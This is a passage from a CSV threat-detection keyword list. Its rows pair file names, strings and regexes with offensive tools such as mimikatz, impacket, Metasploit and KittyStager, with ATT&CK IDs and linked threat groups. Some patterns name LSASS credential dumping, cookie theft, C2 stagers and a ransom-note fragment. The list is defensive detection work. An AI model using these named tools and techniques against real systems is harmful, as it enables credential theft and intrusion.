Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","50472" "*Killing ngrok tunnel*",".{0,1000}Killing\sngrok\stunnel.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","#content","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","50473" "*killme:qAuxiAwegDsZI*",".{0,1000}killme\:qAuxiAwegDsZI.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","50474" "*killprocess.py*",".{0,1000}killprocess\.py.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","50475" "*KILLREMOTESHELL*",".{0,1000}KILLREMOTESHELL.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also known as DarkComet - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","50476" "*kimi_MDPC/kimi.py*",".{0,1000}kimi_MDPC\/kimi\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - 
TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","50477" "*KINGSABRI/ServerlessRedirector*",".{0,1000}KINGSABRI\/ServerlessRedirector.{0,1000}","offensive_tool_keyword","ServerlessRedirector","Serverless Redirector in various cloud vendor for red team","T1090.003 - T1095 - T1001.003","TA0010 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/KINGSABRI/ServerlessRedirector","1","1","N/A","N/A","10","1","72","10","2022-12-08T08:56:02Z","2022-12-08T07:52:49Z","50480" "*kintercept.py*",".{0,1000}kintercept\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","50481" "*kintercept.py*",".{0,1000}kintercept\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","50482" "*KioqUkFOU09NIE5PVEUqKgoKWW91ciBmaWxlcyBoYXZlIGJlZW4gZW5jcnlwdGVkLgoKQWxsIHlvdXIgaW1wb3J0YW50IGZpbGVzLCBpbmNsdWRpbm*",".{0,1000}KioqUkFOU09NIE5PVEUqKgoKWW91ciBmaWxlcyBoYXZlIGJlZW4gZW5jcnlwdGVkLgoKQWxsIHlvdXIgaW1wb3J0YW50IGZpbGVzLCBpbmNsdWRpbm.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","50483" "*kiosk.sh*startVNC.sh*",".{0,1000}kiosk\.sh.{0,1000}startVNC\.sh.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","50484" "*KiRBi ticket for mimikatz*",".{0,1000}KiRBi\sticket\sfor\smimikatz.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - 
T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50485" "*kirbi.tickets*",".{0,1000}kirbi\.tickets.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - 
AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50486" "*kirbi_to_hashcat.py*",".{0,1000}kirbi_to_hashcat\.py.{0,1000}","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","N/A","10","3","282","28","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z","50487" "*kirbi2john.*",".{0,1000}kirbi2john\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50488" "*kirbi2john.py*",".{0,1000}kirbi2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50489" "*kirbi2john.py*",".{0,1000}kirbi2john\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","50490" "*kirbikator.exe*",".{0,1000}kirbikator\.exe.{0,1000}","offensive_tool_keyword","kekeo","access the LSA (Local Security Authority) and manipulate Kerberos tickets. potentially allowing adversaries to gain unauthorized access to Active Directory resources and CIFS file shares","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gentilkiwi/kekeo","1","1","N/A","N/A","N/A","10","1463","214","2021-12-14T10:56:48Z","2015-01-13T21:24:09Z","50491" "*Kirklord1967@tutanota.com*",".{0,1000}Kirklord1967\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50492" "*kite03/echoac-poc*",".{0,1000}kite03\/echoac\-poc.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","N/A","8","2","138","25","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z","50493" "*kitrap0d.x86.dll*",".{0,1000}kitrap0d\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50495" "*kitrap0d_payload*",".{0,1000}kitrap0d_payload.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50496" "*kitten.dll*",".{0,1000}kitten\.dll.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50497" "*kitten/basicKitten*",".{0,1000}kitten\/basicKitten.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50498" "*kitten_test.go*",".{0,1000}kitten_test\.go.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50499" "*Kittens love cookies too! >:3*",".{0,1000}Kittens\slove\scookies\stoo!\s\>\:3.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#content","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","50500" "*kittens/bananaKitten*",".{0,1000}kittens\/bananaKitten.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50501" "*Kittielocal -*",".{0,1000}Kittielocal\s\-.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","50502" "*KittyStager -*",".{0,1000}KittyStager\s\-.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50503" "*KittyStager ?*",".{0,1000}KittyStager\s\?.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50504" "*KittyStager ??*",".{0,1000}KittyStager\s\?\?.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50505" "*KittyStager.git*",".{0,1000}KittyStager\.git.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50506" "*KittyStager/cmd*",".{0,1000}KittyStager\/cmd.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50507" "*KittyStager/internal*",".{0,1000}KittyStager\/internal.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50508" "*KittyStager/kitten*",".{0,1000}KittyStager\/kitten.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50509" "*kiwi flavor !*",".{0,1000}kiwi\sflavor\s!.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50510" "*Kiwi Legit Printer*",".{0,1000}Kiwi\sLegit\sPrinter.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50511" "*Kiwi Security Support Provider*",".{0,1000}Kiwi\sSecurity\sSupport\sProvider.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic 
Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","https://www.virustotal.com/gui/file/5191200b2b3d20b4e970acc72cca38d318ca463a88230580a426975a6f73bb49?nocache=1","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50512" "*KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2*",".{0,1000}KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","50513" "*kiwi_cmd *",".{0,1000}kiwi_cmd\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50514" "*kiwi_cmd*/process:lsass.exe*",".{0,1000}kiwi_cmd.{0,1000}\/process\:lsass\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","50515" "*KIWI_KERBEROS_BUFFER*",".{0,1000}KIWI_KERBEROS_BUFFER.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","50516" "*KIWI_MSV1_0_PRIMARY_CREDENTIALS KO*",".{0,1000}KIWI_MSV1_0_PRIMARY_CREDENTIALS\sKO.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 
